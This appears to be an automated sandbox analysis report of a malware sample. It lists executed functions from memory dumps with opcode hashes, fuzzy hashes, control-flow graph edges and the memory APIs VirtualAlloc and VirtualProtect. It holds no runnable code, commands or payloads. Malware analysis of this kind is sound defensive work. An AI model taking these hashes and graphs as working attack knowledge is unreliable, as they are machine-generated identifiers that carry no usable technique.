                                                                                                                            • Opcode ID: 36418ac359f6df8884e82613a0e9a7d0742a863ad71be7c6b26198f99dec4140
                                                                                                                            • Instruction ID: 60c65ce6f621a48b08876a42e8f949cb695d3572cb3c9f5f8852cd520881738f
                                                                                                                            • Opcode Fuzzy Hash: 36418ac359f6df8884e82613a0e9a7d0742a863ad71be7c6b26198f99dec4140
                                                                                                                            • Instruction Fuzzy Hash: 9C41E30BB8C5674DE31933FC75619FD6B45CFA1279B0842B7F15E890D74E48608187E5

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:6
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 20623 7ffd9b77c491 20624 7ffd9b77c49f VirtualAlloc 20623->20624 20626 7ffd9b77c554 20624->20626 20627 7ffd9b77b4ba 20628 7ffd9b77b4c9 VirtualProtect 20627->20628 20630 7ffd9b77b5ae 20628->20630

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B770D48 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b770000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5Z_H
                                                                                                                            • API String ID: 0-3267294416
                                                                                                                            • Opcode ID: 64241468f6dc34090451d4a5ea4932ef1a594595f492ff41a903ce1d75f9e6c3
                                                                                                                            • Instruction ID: c9923f19abe6c355fe4f439342addf41b2f9fdf28cb2ab5cf41133c6d2d28dba
                                                                                                                            • Opcode Fuzzy Hash: 64241468f6dc34090451d4a5ea4932ef1a594595f492ff41a903ce1d75f9e6c3
                                                                                                                            • Instruction Fuzzy Hash: 2D91F475A19B894FEB99DF6888757A97FE0FF56700F0002FAD149C72E2DAB82814C740
                                                                                                                            Function 00007FFD9B77B4BA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 137memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B777000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B777000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b777000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: UAWA
                                                                                                                            • API String ID: 544645111-1492024814
                                                                                                                            • Opcode ID: 91c9f180a1994ce12f3613c94d9f4b8ebeb7feefa69bcce3162a1bf65000644e
                                                                                                                            • Instruction ID: 737103a8173254b42efbf380a25f205ef0f8f5114f84247a0bafe6dfda09c7d0
                                                                                                                            • Opcode Fuzzy Hash: 91c9f180a1994ce12f3613c94d9f4b8ebeb7feefa69bcce3162a1bf65000644e
                                                                                                                            • Instruction Fuzzy Hash: 78412D31A0C7894FDB199BA898566E97FE0EF56321F0443AFD099D3293CF746406C792
                                                                                                                            Function 00007FFD9B781752 Relevance: 2.2, Strings: 1, Instructions: 949COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 11 7ffd9b781752 12 7ffd9b781757-7ffd9b78177d 11->12 15 7ffd9b781783-7ffd9b7817ae 12->15 16 7ffd9b7818d1-7ffd9b7818fb 12->16 26 7ffd9b7817b0-7ffd9b7817ba 15->26 27 7ffd9b7817bd-7ffd9b781845 15->27 21 7ffd9b7818fd-7ffd9b78191a 16->21 22 7ffd9b781947-7ffd9b78194a 16->22 28 7ffd9b781920-7ffd9b781945 21->28 29 7ffd9b781a8b-7ffd9b781a93 21->29 25 7ffd9b781951-7ffd9b781986 22->25 47 7ffd9b781a2c-7ffd9b781a42 25->47 48 7ffd9b78198c-7ffd9b7819df 25->48 26->27 61 7ffd9b78188c-7ffd9b78188f 27->61 62 7ffd9b781847-7ffd9b78188a 27->62 28->22 35 7ffd9b781a94-7ffd9b781a99 29->35 38 7ffd9b781a9b-7ffd9b781aaf 35->38 39 7ffd9b781a47-7ffd9b781a62 35->39 41 7ffd9b781c4d-7ffd9b781c4e 38->41 55 7ffd9b781a69-7ffd9b781a84 39->55 45 7ffd9b781c55-7ffd9b781c61 41->45 46 7ffd9b781c50 call 7ffd9b782918 41->46 46->45 47->41 48->55 69 7ffd9b7819e5-7ffd9b7819f0 48->69 55->29 64 7ffd9b7818a4-7ffd9b7818a5 61->64 65 7ffd9b781891-7ffd9b7818a2 61->65 68 7ffd9b7818b1-7ffd9b7818cb 62->68 64->68 65->68 68->15 68->16 72 7ffd9b780f9d-7ffd9b780fdc 69->72 73 7ffd9b7819f6-7ffd9b781a00 69->73 84 7ffd9b780fde-7ffd9b781149 72->84 73->35 75 7ffd9b781a06-7ffd9b781a26 73->75 75->47 75->48 109 7ffd9b78114b-7ffd9b781154 84->109 110 7ffd9b781178-7ffd9b7811b9 84->110 112 7ffd9b78115a-7ffd9b78116a 109->112 113 7ffd9b781699-7ffd9b7816cf 109->113 122 7ffd9b7811ce-7ffd9b781243 110->122 123 7ffd9b7811bb-7ffd9b7811cd 110->123 117 7ffd9b781170-7ffd9b781174 112->117 124 7ffd9b7816d1-7ffd9b781710 113->124 125 7ffd9b781748-7ffd9b781751 113->125 117->110 140 7ffd9b781274-7ffd9b7812c3 122->140 141 7ffd9b781245-7ffd9b78126e 122->141 123->122 134 7ffd9b781712-7ffd9b781715 124->134 135 7ffd9b78172a-7ffd9b781746 124->135 125->11 134->135 136 7ffd9b781717-7ffd9b781727 134->136 135->124 135->125 136->135 149 7ffd9b7812cf-7ffd9b781307 140->149 150 7ffd9b7812c5-7ffd9b7812ca 140->150 141->140 155 7ffd9b781313-7ffd9b78134b 149->155 156 7ffd9b781309-7ffd9b78130e 149->156 151 7ffd9b781683-7ffd9b781693 150->151 151->113 151->117 160 7ffd9b78134d-7ffd9b781352 155->160 161 7ffd9b781357-7ffd9b78138f 155->161 156->151 160->151 165 7ffd9b781391-7ffd9b781396 161->165 166 7ffd9b78139b-7ffd9b7813d3 161->166 165->151 170 7ffd9b7813df-7ffd9b781417 166->170 171 7ffd9b7813d5-7ffd9b7813da 166->171 175 7ffd9b781423-7ffd9b78145b 170->175 176 7ffd9b781419-7ffd9b78141e 170->176 171->151 180 7ffd9b78145d-7ffd9b781462 175->180 181 7ffd9b781467-7ffd9b78149f 175->181 176->151 180->151 185 7ffd9b7814a1-7ffd9b7814a6 181->185 186 7ffd9b7814ab-7ffd9b7814e3 181->186 185->151 190 7ffd9b7814ef-7ffd9b781527 186->190 191 7ffd9b7814e5-7ffd9b7814ea 186->191 195 7ffd9b781533-7ffd9b78156b 190->195 196 7ffd9b781529-7ffd9b78152e 190->196 191->151 200 7ffd9b78156d-7ffd9b781572 195->200 201 7ffd9b781577-7ffd9b7815af 195->201 196->151 200->151 205 7ffd9b7815b1-7ffd9b7815b6 201->205 206 7ffd9b7815bb-7ffd9b7815c4 201->206 205->151 206->151
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M_H
                                                                                                                            • API String ID: 0-1939843538
                                                                                                                            • Opcode ID: 85b8ebdb8821d988eecee1f0166582c402bae41dd4c2be4c1753a6669b8ce655
                                                                                                                            • Instruction ID: 2f4c765d719eaeacd44b09abd6c29065393d6d43546031fa75459f414940a52c
                                                                                                                            • Opcode Fuzzy Hash: 85b8ebdb8821d988eecee1f0166582c402bae41dd4c2be4c1753a6669b8ce655
                                                                                                                            • Instruction Fuzzy Hash: 7662B221B19E4E4FEBA8EB6884B56783392FF98701F0506B9D00EC36F2DD34AD818741
                                                                                                                            Function 00007FFD9B77C491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 241 7ffd9b77c491-7ffd9b77c49d 242 7ffd9b77c4a1-7ffd9b77c4dd 241->242 243 7ffd9b77c49f 241->243 244 7ffd9b77c4e1-7ffd9b77c552 VirtualAlloc 242->244 243->242 243->244 247 7ffd9b77c554 244->247 248 7ffd9b77c55a-7ffd9b77c582 244->248 247->248
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B777000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B777000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b777000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 75afd82c597a16a5e05320543eda0b11649b37fc621f1ac55ec38b919792a24d
                                                                                                                            • Instruction ID: a0e4e7a1d933bc5c5f3376915c5ab2926d31601d716f7fd47c2e9801d264df6c
                                                                                                                            • Opcode Fuzzy Hash: 75afd82c597a16a5e05320543eda0b11649b37fc621f1ac55ec38b919792a24d
                                                                                                                            • Instruction Fuzzy Hash: BD313C31A0CB4C4FDB1DAB6898566F97BF0EF9A321F04426FE04AC3153DA646815C781
                                                                                                                            Function 00007FFD9B7A1679 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 257 7ffd9b7a1679-7ffd9b7a1689 258 7ffd9b7a168b-7ffd9b7a16b3 257->258 259 7ffd9b7a1611-7ffd9b7a161a 257->259 261 7ffd9b7a161e-7ffd9b7a1623 259->261
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 0768cf83cb9440808908038b7baee1a65ff7962be94f92c557e9103e00d04c8b
                                                                                                                            • Instruction ID: 864083c7f51a3c9bd8215595fa6fe2bf9c9368c6e1cbb6e241799b1f0a9001ab
                                                                                                                            • Opcode Fuzzy Hash: 0768cf83cb9440808908038b7baee1a65ff7962be94f92c557e9103e00d04c8b
                                                                                                                            • Instruction Fuzzy Hash: 38F0BB3060A7884FDB59AA3988694547FA0EF6720174A52EEC046CF1A3DE2DDCC6C701
                                                                                                                            Function 00007FFD9B7A15E9 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 250 7ffd9b7a15e9-7ffd9b7a15f9 251 7ffd9b7a15fb-7ffd9b7a160e 250->251 252 7ffd9b7a1581-7ffd9b7a1596 250->252 255 7ffd9b7a1611-7ffd9b7a161a 251->255 256 7ffd9b7a161e-7ffd9b7a1623 255->256
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: dbe9a765d455ec7c1779ce623169b49db9adc29d16182ae5019c8438c9edd475
                                                                                                                            • Instruction ID: eb1b6f303a05158014ce32937c2d2e1ab0a020b3c6c553c83707feb648303707
                                                                                                                            • Opcode Fuzzy Hash: dbe9a765d455ec7c1779ce623169b49db9adc29d16182ae5019c8438c9edd475
                                                                                                                            • Instruction Fuzzy Hash: 10F06831A0A7844FD759AA7988698547FA0EF6720174642EEC046CF5B3DA19DC85C741
                                                                                                                            Function 00007FFD9B7AA529 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 263 7ffd9b7aa529-7ffd9b7aa53d 264 7ffd9b7aa53f-7ffd9b7aa55a 263->264 265 7ffd9b7aa55e-7ffd9b7aa563 264->265
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: a93d2a248ea0654378756a9141250200c30c0adf332f666a415f47f781cf5e95
                                                                                                                            • Instruction ID: 6931bf5223a78d7b570b726fab5cc590d3e02653aec87cace6b8d6fcd26d403c
                                                                                                                            • Opcode Fuzzy Hash: a93d2a248ea0654378756a9141250200c30c0adf332f666a415f47f781cf5e95
                                                                                                                            • Instruction Fuzzy Hash: DDE0656160E7C44FC71AD6744869454BFA0EF6721174A42EEC045CF1A7EA1D8885CB01
                                                                                                                            Function 00007FFD9B7993E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 266 7ffd9b7993e9-7ffd9b799414 268 7ffd9b799418-7ffd9b79941d 266->268
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b793000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 125b5bc173154e6d4a94e4e80b73751d94c7972a0a5d355a41492f35a1e5dcb1
                                                                                                                            • Instruction ID: cc30c23fc4e547a2946316859384af3fa3b7be558d339d2a5eead1ba0bbc7c11
                                                                                                                            • Opcode Fuzzy Hash: 125b5bc173154e6d4a94e4e80b73751d94c7972a0a5d355a41492f35a1e5dcb1
                                                                                                                            • Instruction Fuzzy Hash: 2AE0E56154E7C48FDB56EA74886A8547FA0AF6B21078A41EEC089CB1B3E6299849C701
                                                                                                                            Function 00007FFD9B799599 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 269 7ffd9b799599-7ffd9b7995c4 270 7ffd9b7995c8-7ffd9b7995cd 269->270
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b793000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 9f04dc6ddcf9306befead4eb45ac78a9e3efd481051b3d51e923b5a525de626b
                                                                                                                            • Instruction ID: 2decf7cdf0b6a8137ceb2c839a535a4f2329786d650a15ff47397300a79bba6b
                                                                                                                            • Opcode Fuzzy Hash: 9f04dc6ddcf9306befead4eb45ac78a9e3efd481051b3d51e923b5a525de626b
                                                                                                                            • Instruction Fuzzy Hash: 78E04F7154A3C04FCB16EB7488A98457FB0EE6721078B41DEC04ACB1B3E62DD949CB01
                                                                                                                            Function 00007FFD9B7A1AD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 271 7ffd9b7a1ad9-7ffd9b7a1aed 272 7ffd9b7a1aef-7ffd9b7a1b04 271->272 273 7ffd9b7a1b08-7ffd9b7a1b0d 272->273
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: ca249ac62d4b0a9b106ef4829e80241cf880ff62619d6a86180e9d838983c85e
                                                                                                                            • Instruction ID: f0e4966808ee54329ee4507175720b8a9c8ec9678878fcb04f4e1cf098b38544
                                                                                                                            • Opcode Fuzzy Hash: ca249ac62d4b0a9b106ef4829e80241cf880ff62619d6a86180e9d838983c85e
                                                                                                                            • Instruction Fuzzy Hash: 9AE01A6154F7C48FCB56EB7488698457FA0EE6B21078B41EEC089CF1B3E62D8849CB01
                                                                                                                            Function 00007FFD9B7A7E19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 274 7ffd9b7a7e19-7ffd9b7a7e44 276 7ffd9b7a7e48-7ffd9b7a7e4d 274->276
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 05e2efae1749ebba7e531536ad54cce18b74356b03b21bc989c0cfa8ad1ca45b
                                                                                                                            • Instruction ID: 785abcc5c99e01c55f1b19db252c98afe54485a7caf5d8705288beafd40f4f84
                                                                                                                            • Opcode Fuzzy Hash: 05e2efae1749ebba7e531536ad54cce18b74356b03b21bc989c0cfa8ad1ca45b
                                                                                                                            • Instruction Fuzzy Hash: A1E01A6154F7C44FCB56EB7488698447FA1AE6B21078B41EEC185CF1B3E62D9849C701
                                                                                                                            Function 00007FFD9B7995D1 Relevance: .3, Instructions: 312COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B793000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B793000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b793000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7040447c545500c42db0c5a0e9be049aa3dc08dfae4a9cf51781c4a1212eab60
                                                                                                                            • Instruction ID: e6c5c63283b3fa875aabd44b262a4db2c5d9e8439306ecd54a6f42fb8eb5bc45
                                                                                                                            • Opcode Fuzzy Hash: 7040447c545500c42db0c5a0e9be049aa3dc08dfae4a9cf51781c4a1212eab60
                                                                                                                            • Instruction Fuzzy Hash: 05A19230B199494FEB58EF68C4A4AB977E1FF99304F5106B9E11EC32E6DE34A842C741
                                                                                                                            Function 00007FFD9B7A317D Relevance: .3, Instructions: 287COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 40b0d3e3246e24af2e66ce06082c54bfc7d2ab37dac18e464601faa200c64f72
                                                                                                                            • Instruction ID: 5c390d5325df7e2aa3eb1fa2f9a9952376bcf4ae4ee54dbc1f789e3960db1a8f
                                                                                                                            • Opcode Fuzzy Hash: 40b0d3e3246e24af2e66ce06082c54bfc7d2ab37dac18e464601faa200c64f72
                                                                                                                            • Instruction Fuzzy Hash: 6591E521B1DA4E0FEBD8EF68847667972C2EF94340F4642BAE40DC72E7DD2879458391
                                                                                                                            Function 00007FFD9B7A2111 Relevance: .1, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 02390c3e9e763d64fded275c3d5a0cbd74afd5e1bfff5da087b9d39224758d28
                                                                                                                            • Instruction ID: 5a44f7de8bfa43db5b82b2af7e6028c10ca63c467eb353c238597e25359d716a
                                                                                                                            • Opcode Fuzzy Hash: 02390c3e9e763d64fded275c3d5a0cbd74afd5e1bfff5da087b9d39224758d28
                                                                                                                            • Instruction Fuzzy Hash: 21313831A0D65D8FE769DB58C8747F53791EB95310F0602BED40AC72E2DA686D41C781
                                                                                                                            Function 00007FFD9B7AD621 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0b4c7b65e5c40e92d7550907ec288c85d26b4ffc499e88f3f9e757f864ecc869
                                                                                                                            • Instruction ID: b57b1478c9a9fe3af5930b82b9b8973aabe590c42523c20db90b682d5aa6b4de
                                                                                                                            • Opcode Fuzzy Hash: 0b4c7b65e5c40e92d7550907ec288c85d26b4ffc499e88f3f9e757f864ecc869
                                                                                                                            • Instruction Fuzzy Hash: D621E532F09A1D4FEBA8DA68D8243E977E1EB58310F0506B7D019D32E5DE38AE4187C0
                                                                                                                            Function 00007FFD9B770C25 Relevance: .1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b770000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 66acbdfa29e259dc479f8b128244f3393379f8680fb77eda9ee1d0b25a72248f
                                                                                                                            • Instruction ID: 2975ada1e1f6c54c3359bbf30bc1f58d345ba2193e935e826e06f3674e3176b6
                                                                                                                            • Opcode Fuzzy Hash: 66acbdfa29e259dc479f8b128244f3393379f8680fb77eda9ee1d0b25a72248f
                                                                                                                            • Instruction Fuzzy Hash: B721F936B0D75D8FEB22A7A89C650EC7B60EF42325F1542F7D148CB1E3D97826468781
                                                                                                                            Function 00007FFD9B78B402 Relevance: .1, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b780000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4e21ff6855d0298a4ba47423e8e1ffe976fd8fcbaca69dd502af4ff801b11c72
                                                                                                                            • Instruction ID: cb7e927b31f7537b8f6f5bd1c9e0e73c9fc80429a413cb08c0f83755b58cb4be
                                                                                                                            • Opcode Fuzzy Hash: 4e21ff6855d0298a4ba47423e8e1ffe976fd8fcbaca69dd502af4ff801b11c72
                                                                                                                            • Instruction Fuzzy Hash: 19216221B09E5E8FFBB4AA6884E56B833D2EB94311F150679C40DD72B6DE38AD024780
                                                                                                                            Function 00007FFD9B770C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b770000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e6ccea529ea01e4a9675c20be81988027e339ade7c2926277c2e372ce70700f4
                                                                                                                            • Instruction ID: 9e31f33889cefd968c554faa60952fec8b5f0c056840761a5cd1482aff4604c8
                                                                                                                            • Opcode Fuzzy Hash: e6ccea529ea01e4a9675c20be81988027e339ade7c2926277c2e372ce70700f4
                                                                                                                            • Instruction Fuzzy Hash: 09117335B0E78D8FEB22DBA888A51EC7BB0EF52714F1646B7C044DB1F2D97416458781
                                                                                                                            Function 00007FFD9B7AAD4D Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.1843164859.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ffd9b7a1000_mGDcgYSpPaqkzVyIrStmzarQirIs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c6ee41dc8804c081d866addbec05e5c385ec12b7469fe03bc0daf53caccb57c0
                                                                                                                            • Instruction ID: 45fa50b4c5158e99b30ddff30c99093629c6e4dc96ec8b96107c99bb5688852b
                                                                                                                            • Opcode Fuzzy Hash: c6ee41dc8804c081d866addbec05e5c385ec12b7469fe03bc0daf53caccb57c0
                                                                                                                            • Instruction Fuzzy Hash: 4101F931B09A0D4FEB94E79854A67F9B3D1FF58301F440276E50CC32A2CF1468448742
                                                                                                                            Function 00007FFD9B78B46D Relevance: .0, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
